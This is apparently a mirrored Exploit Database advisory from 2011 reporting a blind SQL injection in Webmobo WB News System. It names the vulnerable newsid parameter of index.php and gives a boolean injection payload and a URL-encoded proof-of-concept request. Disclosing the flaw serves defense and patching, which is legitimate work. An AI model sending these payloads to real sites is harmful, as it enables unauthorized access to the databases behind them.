Webmobo WB News System – Blind SQL Injection

• Exploit Database
• 11 阅读

• 作者： Eyup CELIK
  日期： 2011-09-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17786/

• # Exploit Title: Webmobo News System Blind SQL Injection
  # Date: 2011
  # Author: Eyup CELIK
  # Version: All Version
  # Tested on: All versions are Vulnerability
  # Web Site: www.eyupcelik.com.tr
  
  
  ISSUE
  
  Blind SQL Injection can be done using the command input
  
  Vulnerable Page:
  index.php
  
  Example:
  index.php?action=sendto&newsid=<Blind SQL Injection Code>
  
  Exploit:
  index.php?action=sendto&newsid=1' and '2'='2
  
  POC:
  http://server/index.php?action=sendto&newsid=1%27%20and%20%272%27=%272
  
  
  Thanks,
  
  Eyup CELIK
  Information Technology Security Specialist
  http://www.eyupcelik.com.tr